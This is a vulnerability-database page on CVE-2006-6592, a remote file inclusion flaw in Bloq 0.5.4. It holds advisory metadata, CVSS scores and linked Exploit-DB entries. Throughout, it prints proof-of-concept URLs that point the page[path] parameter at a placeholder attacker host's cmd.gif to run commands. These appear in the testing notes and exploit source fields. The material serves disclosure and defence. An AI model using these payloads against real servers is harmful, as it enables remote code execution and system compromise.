Search...

Bloq rdf.php page[path] Variable Remote File Inclusion

2006-10-12T09:57:07

ID OSVDB:32432
Type osvdb
Reporter OSVDB
Modified 2006-10-12T09:57:07

Description

Manual Testing Notes

http://[target]/[path]/rdf.php?page[path]=http://[attacker]/cmd.gif?&cmd=ls

References:

Related OSVDB ID: 32428 Related OSVDB ID: 32429 Related OSVDB ID: 32431 Related OSVDB ID: 32433 Related OSVDB ID: 32430 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0204.html ISS X-Force ID: 29585 CVE-2006-6592 Bugtraq ID: 20512

JSON Vulners Source

Initial Source

{"bulletinFamily": "software", "viewCount": 5, "reporter": "OSVDB", "references": [], "description": "## Manual Testing Notes\nhttp://[target]/[path]/rdf.php?page[path]=http://[attacker]/cmd.gif?&cmd=ls\n## References:\n[Related OSVDB ID: 32428](https://vulners.com/osvdb/OSVDB:32428)\n[Related OSVDB ID: 32429](https://vulners.com/osvdb/OSVDB:32429)\n[Related OSVDB ID: 32431](https://vulners.com/osvdb/OSVDB:32431)\n[Related OSVDB ID: 32433](https://vulners.com/osvdb/OSVDB:32433)\n[Related OSVDB ID: 32430](https://vulners.com/osvdb/OSVDB:32430)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0204.html\nISS X-Force ID: 29585\n[CVE-2006-6592](https://vulners.com/cve/CVE-2006-6592)\nBugtraq ID: 20512\n", "affectedSoftware": [], "href": "https://vulners.com/osvdb/OSVDB:32432", "modified": "2006-10-12T09:57:07", "enchantments": {"score": {"value": 6.9, "vector": "NONE", "modified": "2017-04-28T13:20:28", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-6592"]}, {"type": "osvdb", "idList": ["OSVDB:32431", "OSVDB:32428", "OSVDB:32429", "OSVDB:32430", "OSVDB:32433"]}, {"type": "exploitdb", "idList": ["EDB-ID:28797", "EDB-ID:28802", "EDB-ID:28798", "EDB-ID:28799", "EDB-ID:28801", "EDB-ID:28800"]}], "modified": "2017-04-28T13:20:28", "rev": 2}, "vulnersScore": 6.9}, "id": "OSVDB:32432", "title": "Bloq rdf.php page[path] Variable Remote File Inclusion", "edition": 1, "published": "2006-10-12T09:57:07", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "cvelist": ["CVE-2006-6592"], "lastseen": "2017-04-28T13:20:28"}

{"cve": [{"lastseen": "2020-10-03T11:48:20", "description": "Multiple PHP remote file inclusion vulnerabilities in Bloq 0.5.4 allow remote attackers to execute arbitrary PHP code via a URL in the page[path] parameter to (1) index.php, (2) admin.php, (3) rss.php, (4) rdf.php, (5) rss2.php, or (6) files/mainfile.php.", "edition": 3, "cvss3": {}, "published": "2006-12-15T19:28:00", "title": "CVE-2006-6592", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-6592"], "modified": "2018-10-17T21:49:00", "cpe": ["cpe:/a:php:bloq:0.5.4"], "id": "CVE-2006-6592", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-6592", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:php:bloq:0.5.4:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "cvelist": ["CVE-2006-6592"], "description": "## Manual Testing Notes\nhttp://[target]/[path]/rss2.php?page[path]=http://[attacker]/cmd.gif?&cmd=ls\n## References:\n[Related OSVDB ID: 32428](https://vulners.com/osvdb/OSVDB:32428)\n[Related OSVDB ID: 32429](https://vulners.com/osvdb/OSVDB:32429)\n[Related OSVDB ID: 32432](https://vulners.com/osvdb/OSVDB:32432)\n[Related OSVDB ID: 32433](https://vulners.com/osvdb/OSVDB:32433)\n[Related OSVDB ID: 32430](https://vulners.com/osvdb/OSVDB:32430)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0204.html\nISS X-Force ID: 29585\n[CVE-2006-6592](https://vulners.com/cve/CVE-2006-6592)\nBugtraq ID: 20512\n", "edition": 1, "modified": "2006-10-12T09:57:07", "published": "2006-10-12T09:57:07", "href": "https://vulners.com/osvdb/OSVDB:32431", "id": "OSVDB:32431", "title": "Bloq rss2.php page[path] Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "cvelist": ["CVE-2006-6592"], "description": "## Manual Testing Notes\nhttp://[target]/[path]/files/mainfile.php?page[path]=http://[attacker]/cmd.gif?&cmd=ls\n## References:\n[Related OSVDB ID: 32428](https://vulners.com/osvdb/OSVDB:32428)\n[Related OSVDB ID: 32429](https://vulners.com/osvdb/OSVDB:32429)\n[Related OSVDB ID: 32431](https://vulners.com/osvdb/OSVDB:32431)\n[Related OSVDB ID: 32432](https://vulners.com/osvdb/OSVDB:32432)\n[Related OSVDB ID: 32430](https://vulners.com/osvdb/OSVDB:32430)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0204.html\nISS X-Force ID: 29585\n[CVE-2006-6592](https://vulners.com/cve/CVE-2006-6592)\nBugtraq ID: 20512\n", "edition": 1, "modified": "2006-10-12T09:57:07", "published": "2006-10-12T09:57:07", "href": "https://vulners.com/osvdb/OSVDB:32433", "id": "OSVDB:32433", "title": "Bloq files/mainfile.php page[path] Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "cvelist": ["CVE-2006-6592"], "description": "## Manual Testing Notes\nhttp://[target]/[path]/index.php?page[path]=http://[attacker]/cmd.gif?&cmd=ls\n## References:\n[Related OSVDB ID: 32429](https://vulners.com/osvdb/OSVDB:32429)\n[Related OSVDB ID: 32431](https://vulners.com/osvdb/OSVDB:32431)\n[Related OSVDB ID: 32432](https://vulners.com/osvdb/OSVDB:32432)\n[Related OSVDB ID: 32433](https://vulners.com/osvdb/OSVDB:32433)\n[Related OSVDB ID: 32430](https://vulners.com/osvdb/OSVDB:32430)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0204.html\nISS X-Force ID: 29585\n[CVE-2006-6592](https://vulners.com/cve/CVE-2006-6592)\nBugtraq ID: 20512\n", "edition": 1, "modified": "2006-10-12T09:57:07", "published": "2006-10-12T09:57:07", "href": "https://vulners.com/osvdb/OSVDB:32428", "id": "OSVDB:32428", "title": "Bloq index.php page[path] Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "cvelist": ["CVE-2006-6592"], "description": "## Manual Testing Notes\nhttp://[target]/[path]/admin.php?page[path]=http://[attacker]/cmd.gif?&cmd=ls\n## References:\n[Related OSVDB ID: 32428](https://vulners.com/osvdb/OSVDB:32428)\n[Related OSVDB ID: 32431](https://vulners.com/osvdb/OSVDB:32431)\n[Related OSVDB ID: 32432](https://vulners.com/osvdb/OSVDB:32432)\n[Related OSVDB ID: 32433](https://vulners.com/osvdb/OSVDB:32433)\n[Related OSVDB ID: 32430](https://vulners.com/osvdb/OSVDB:32430)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0204.html\nISS X-Force ID: 29585\n[CVE-2006-6592](https://vulners.com/cve/CVE-2006-6592)\nBugtraq ID: 20512\n", "edition": 1, "modified": "2006-10-12T09:57:07", "published": "2006-10-12T09:57:07", "href": "https://vulners.com/osvdb/OSVDB:32429", "id": "OSVDB:32429", "title": "Bloq admin.php page[path] Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "cvelist": ["CVE-2006-6592"], "description": "## Manual Testing Notes\nhttp://[target]/[path]/rss.php?page[path]=http://[attacker]/cmd.gif?&cmd=ls\n## References:\n[Related OSVDB ID: 32428](https://vulners.com/osvdb/OSVDB:32428)\n[Related OSVDB ID: 32429](https://vulners.com/osvdb/OSVDB:32429)\n[Related OSVDB ID: 32431](https://vulners.com/osvdb/OSVDB:32431)\n[Related OSVDB ID: 32432](https://vulners.com/osvdb/OSVDB:32432)\n[Related OSVDB ID: 32433](https://vulners.com/osvdb/OSVDB:32433)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0204.html\nISS X-Force ID: 29585\n[CVE-2006-6592](https://vulners.com/cve/CVE-2006-6592)\nBugtraq ID: 20512\n", "edition": 1, "modified": "2006-10-12T09:57:07", "published": "2006-10-12T09:57:07", "href": "https://vulners.com/osvdb/OSVDB:32430", "id": "OSVDB:32430", "title": "Bloq rss.php page[path] Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-03T08:57:07", "description": "Bloq 0.5.4 index.php page[path] Parameter Remote File Inclusion. CVE-2006-6592. Webapps exploit for php platform", "published": "2006-10-13T00:00:00", "type": "exploitdb", "title": "Bloq 0.5.4 - index.php pagepath Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-6592"], "modified": "2006-10-13T00:00:00", "id": "EDB-ID:28797", "href": "https://www.exploit-db.com/exploits/28797/", "sourceData": "source: http://www.securityfocus.com/bid/20512/info\r\n\r\nBloq is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n\r\nExploiting these issues could allow an attacker to compromise the application and the underlying system; other attacks are also possible.\r\n\r\nVersion 0.5.4 is vulnerable to these issues; other versions may also be affected.\r\n\r\nhttp://www.example.com/[PATHSCRİPT]/index.php?page[path]=http://www.example.com/cmd.gif?&cmd=ls", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/28797/"}, {"lastseen": "2016-02-03T08:57:15", "description": "Bloq 0.5.4 admin.php page[path] Parameter Remote File Inclusion. CVE-2006-6592. Webapps exploit for php platform", "published": "2006-10-13T00:00:00", "type": "exploitdb", "title": "Bloq 0.5.4 - admin.php pagepath Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-6592"], "modified": "2006-10-13T00:00:00", "id": "EDB-ID:28798", "href": "https://www.exploit-db.com/exploits/28798/", "sourceData": "source: http://www.securityfocus.com/bid/20512/info\r\n \r\nBloq is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to compromise the application and the underlying system; other attacks are also possible.\r\n \r\nVersion 0.5.4 is vulnerable to these issues; other versions may also be affected.\r\n\r\nhttp://www.example.com/[PATHTOSCRİPT]/admin.php?page[path]=http://www.example.com/cmd.gif?&cmd=ls", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/28798/"}, {"lastseen": "2016-02-03T08:57:24", "description": "Bloq 0.5.4 rss.php page[path] Parameter Remote File Inclusion. CVE-2006-6592. Webapps exploit for php platform", "published": "2006-10-13T00:00:00", "type": "exploitdb", "title": "Bloq 0.5.4 - rss.php pagepath Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-6592"], "modified": "2006-10-13T00:00:00", "id": "EDB-ID:28799", "href": "https://www.exploit-db.com/exploits/28799/", "sourceData": "source: http://www.securityfocus.com/bid/20512/info\r\n \r\nBloq is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to compromise the application and the underlying system; other attacks are also possible.\r\n \r\nVersion 0.5.4 is vulnerable to these issues; other versions may also be affected.\r\n \r\nhttp://www.example.com/[PATHTOSCRİPT]/rss.php?page[path]=http://www.example.com/cmd.gif?&cmd=ls", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/28799/"}, {"lastseen": "2016-02-03T08:57:32", "description": "Bloq 0.5.4 rss2.php page[path] Parameter Remote File Inclusion. CVE-2006-6592. Webapps exploit for php platform", "published": "2006-10-13T00:00:00", "type": "exploitdb", "title": "Bloq 0.5.4 - rss2.php pagepath Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-6592"], "modified": "2006-10-13T00:00:00", "id": "EDB-ID:28800", "href": "https://www.exploit-db.com/exploits/28800/", "sourceData": "source: http://www.securityfocus.com/bid/20512/info\r\n \r\nBloq is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to compromise the application and the underlying system; other attacks are also possible.\r\n \r\nVersion 0.5.4 is vulnerable to these issues; other versions may also be affected.\r\n\r\nhttp://www.example.com/[PATHTOSCRİPT]/rss2.php?page[path]=http://www.example.com/cmd.gif?&cmd=l10:32 ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/28800/"}, {"lastseen": "2016-02-03T08:57:40", "description": "Bloq 0.5.4 rdf.php page[path] Parameter Remote File Inclusion. CVE-2006-6592. Webapps exploit for php platform", "published": "2006-10-13T00:00:00", "type": "exploitdb", "title": "Bloq 0.5.4 - rdf.php pagepath Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-6592"], "modified": "2006-10-13T00:00:00", "id": "EDB-ID:28801", "href": "https://www.exploit-db.com/exploits/28801/", "sourceData": "source: http://www.securityfocus.com/bid/20512/info\r\n \r\nBloq is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to compromise the application and the underlying system; other attacks are also possible.\r\n \r\nVersion 0.5.4 is vulnerable to these issues; other versions may also be affected.\r\n\r\nhttp://www.example.com/[PATHTOSCRİPT]/rdf.php?page[path]=http://www.example.com/cmd.gif?&cmd=ls", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/28801/"}, {"lastseen": "2016-02-03T08:57:49", "description": "Bloq 0.5.4 files/mainfile.php page[path] Parameter Remote File Inclusion. CVE-2006-6592. Webapps exploit for php platform", "published": "2006-10-13T00:00:00", "type": "exploitdb", "title": "Bloq 0.5.4 - files/mainfile.php pagepath Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-6592"], "modified": "2006-10-13T00:00:00", "id": "EDB-ID:28802", "href": "https://www.exploit-db.com/exploits/28802/", "sourceData": "source: http://www.securityfocus.com/bid/20512/info\r\n \r\nBloq is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to compromise the application and the underlying system; other attacks are also possible.\r\n \r\nVersion 0.5.4 is vulnerable to these issues; other versions may also be affected.\r\n\r\nhttp://www.example.com/[PATHTOSCRİPT]/files/mainfile.php?page[path]=http://www.example.com/cmd.gif?&cmd=ls", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/28802/"}]}